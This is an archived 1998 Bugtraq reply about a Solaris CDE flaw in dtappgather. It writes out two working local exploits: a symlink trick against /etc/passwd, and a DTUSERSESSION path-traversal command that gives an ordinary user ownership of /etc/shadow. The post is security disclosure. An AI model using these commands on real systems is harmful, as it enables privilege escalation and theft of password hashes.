Bugtraq mailing list archives
Re: /usr/dt/bin/dtappgather exploit
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 24 Feb 1998 20:30:20 +0100
I suppose you have learnt about CERT's advisory on dtappgather program. Well, here's the exploit: nigg0r@host% ls -l /etc/passwd -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0 nigg0r@host% dtappgather
the exploit is much simpler than that. hey, it's even documented on the man page :-) Simply $ id uid=6969(foo) gid=666(bar) $ ls -l /etc/shadow -r-------- 1 root sys 234 Nov 7 1999 /etc/shadow $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather $ ls -l /etc/shadow -r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow Anyway, your exploit has an advantage: it works (at least, in solaris 2.5), even after patching CDE according to CERT advisory. Solaris 2.6 seems to have the right permisions: /var/dt -> rwxr-xr-x /var/dt/appconfig -> rwxr-xr-x /var/dt/tmp -> rwxrwxrwt -- J.A. Gutierrez So be easy and free when you're drinking with me I'm a man you don't meet every day finger me for PGP (the pogues)
Current thread:
- /usr/dt/bin/dtappgather exploit Mastoras (Feb 23)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 24)
- AOL Instant Messanger Bug Aleph One (Feb 24)
- Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files kevingeo () CRUZIO COM (Feb 25)
- Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary William T Wilson (Feb 25)
- Quake 2 Linux 3.13 - ref_root.so still works kevingeo () CRUZIO COM (Feb 25)
- <Possible follow-ups>
- Re: /usr/dt/bin/dtappgather exploit Steven Goldberg - SE - Seattle WA (Feb 25)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 25)